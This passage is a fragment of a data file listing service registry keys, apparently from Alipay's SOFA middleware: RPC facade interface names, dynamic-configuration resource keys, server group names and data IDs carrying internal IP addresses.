.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrdermngDegradeDRM.savePricePlanProducts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_PCREDIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.assettrans.facade.faasset.api.asset.FaAssetCommonTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxlib.core.change.channel.MessageReceiver:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.MemberActivateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.13.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.vouchercore.service.facade.api.voucher.VoucherConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.TransferMobileSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_FINRESEARCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pcardsales:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.sampleRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.channelspop.service.decision.workbench.plan.DecisionPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.OutcallInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.4.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintradecenter.core.service.prodtrans.ProdTransRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.182.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassetcore.common.service.assetcore.zcb.facade.ZcbAssetListQueryRzFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:bizfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbposprod.common.service.facade.api.KmsStallManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.itemArrangementProductConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.252.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_C_EBPPCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.pdcore.common.service.facade.ProductServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.TairToTbaseSwitch.shadowFullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstacc.facade.quality.AbnormalManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.232.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mashup:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.bp.engine.service.BPService:1.0:mrchasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:lifeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.68.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.service.facade.common.operate.api.DailycutOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imaspmng_trafficCommonProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fpdecisionfake@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kbticketcenter.KbtOperateRefundTicketService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-xmotiontwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.WTCatFacade:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucns.common.service.facade.LinkCardConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.plan.PlanSignRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscprod.facade.prophet.UserConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zcache.tbase.chargeTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.grayprod.change.drm.ChangePolicy.statusChangePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.44.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_merchantSmsCreate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:yuyanbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.dailycut.api.CollectAccountSumService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.core.service.finfund.FinUserRiskRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.starstage.facade.StarstageDictionaryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antfinancial.antchain.cloud.endpoint.facade.WebDataSourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.GroupTargetAndWhiteConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.MemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundTradePayQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.CombinedViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.NodeListQueryApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:promoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.common.ApprovalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.biz.shared.statistics.ResultRecordStatisticsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_P_RISK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.collectcore:name=com.shangshu.collectcore.core.filter.control.DedupFilterSwitch.merchantList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.app.BatchModifyPublicFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkvoiceprod.facade.query.api.CallOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.41.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.discount.common.service.facade.management.CampaignQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.fund.facade.api.TaobaoFundTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.agds.master.dubbo.ModelTestInfoManager:1.0:bkModelTestInfoManager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.airbops.biz.changemng.drm.ChangemngDrmConfig.groovyFormat1,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.service.facade.rec.api.RecItemLabelRelQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.common.service.facade.api.bizroute.BusinessNodeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.RCacheServerTBaseCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.config.ZcbConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_ACC_LOGIC_BILL_GENERATE_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.246.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.batchAuditDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.130.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insautobff:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.renderweb:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.capacity,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityidentify.service.cvm.CvmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.closeMenuPidStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsearch.common.service.facade.api.blacklist.BlacklistQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:publictest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbqa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ap.bizprod.common.service.facade.api.aml.AmlManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:alice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.amc.service.AmcClueGangConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.eindustrycenter.common.service.facade.mng.EindustryProviderSettleMngFacade:1.0:ebppcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.space.api.CreativeRecallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.core.service.group.biz.FamilyGroupBizService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbodmp.biz.crowd.facade.match.service.CrowdMatchAdapterFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cardbin.common.service.client.CardBinValidator:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.facade.item.api.NewSsuConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.securityprod.ValidateControlInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.config.service.PointCertConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.137.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.crmhome.common.service.facade.api.equipment.EquipmentReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cryptprod.common.service.client.api.MacClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.specialLicense.SpecialLicenseSofaRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.finstore.common.service.facade.fundmanager.FundManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.memberprod.common.service.account.query.TaobaoBindingQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightmng.common.service.facade.strategy.api.FeatureServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.landlordgame.facade.api.PlayerInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.query.PointAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.agreement.service.ExtAgreementManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alm.service.facade.facade.InstALManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.CommonTaskRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finriskmatrix.facade.RiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincapacity.biz.facade.InstAbilityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.AccountCancelOperateFacade:1.0:bkpaycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.filex.admin.FileSourceManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinquotationprod.common.service.facade.api.DataTableFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PrePayAssetConsultDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.QsShareStruFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.FundCardInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:servicegoverncenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.promox.facade.assets.TagQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.biz.schedule.loadtest.MainSubTaskLoadTestSplitor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.persona.PersonaQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.debittrans.service.facade.accounttrans.api.AccountTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:insrapbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.ShopService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bar@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.task.mrch.MrchTaskTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:ordermng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:FUND_SCHEME_EVENT_GROUP_MANAGE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.fmpSingleDataSource.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:publicDomain_agdsdatahub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.risk.ChangeRiskAssessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.AttachmentFacade:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.arks.drm.DRMLoadBalanceResource.updateRtDistIntervalMsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.batchActivitySmidFileMaxSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financemng.common.service.integration.zcbsalescenter.ZCBSalescenterAssetClaimApplyFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobileops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:pcreditchannelsff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.authcenter.common.service.oauth.facade.api.QueryTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.biz.rpc.api.lottery.LotteryRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocommopt.com.service.facade.access.api.IotInspireAccessCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuInstitutionPublicAccountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffxtrade.common.service.facade.api.FxTradeBookFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rmsdeploy.common.service.facade.OSSPrivateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.api.FinishAccountListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.pointcore_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.viponlyenforce.VipOnlyEnforceRouteRestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.isv.common.service.facade.StoreInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.132.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.decisionx.engine.common.coordinator.service.ConfigLoadService:1.0:uioservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundapplication.common.service.facade.inner.newyearone.DynamicRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.NonStandardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.230.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.operatelog.OperateLogActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanrepay.common.service.facade.service.support.ForceRepayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.ugcnews.api.UgcToNewsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.204.187#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.crmhome.common.service.facade.api.merchant.MerchantRebateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:zhubglobal-test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:onlineTradePayHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prediction.PredictionService:1.0:predictproxyint@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financingcore.moneyfund.facade.api.MFundFreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imtmsvcprod.common.service.facade.edu.SchoolBackyardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_ALI_TP_S_BC_YOUKU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ismonitor.core.service.censor.emcevent.CensorEmcEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.yebscene.query.YebcTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.131.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebillcenter.common.service.facade.EbillReverseIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.QualityCtrlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.membercenterTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.60.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcinstoperation.common.service.facade.api.usertransfer.TransferProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.TestQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.service.facade.CacheConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.21.104.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:cn.com.antcloud.aciamcore.common.service.facade.access.RoleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ctu.biz.asyn.service.UctAsynAnalyzeTRService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdarttool.facade.print.PrintFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.AemcTemplateManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.web.infoview.drm.InfoviewResourceDRM.webCateDataCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcactivitycore.facade.play.group.UserGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.172.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqueue.client.qaZQueue49#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydataservice:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundmng.biz.shared.instwithdraw.event.FundToFinanceEventSender:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostUrlList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appfuse.common.service.facade.AppfuseConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:antfeatureflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.GrayConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rone.biz.manager.support.api.CodeTemplateProvider:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:receivableNotify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesync.common.service.spi.api.MobileSyncSpiService:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commissioncenter.common.service.facade.api.MyRelevantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mergepayprod.common.service.facade.mergeorder.api.AmountDistributeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_BAOXIANDATAPROC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nfcc.common.service.facade.WebappQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.common.service.facade.manage.TemplateMetadataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0.0:autoinsprodAntProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msgbroker-tutorial:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkRefererWithParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_PCREDITAGREEMENT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.service.facade.triple.VoucherManageAPI:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.RepoC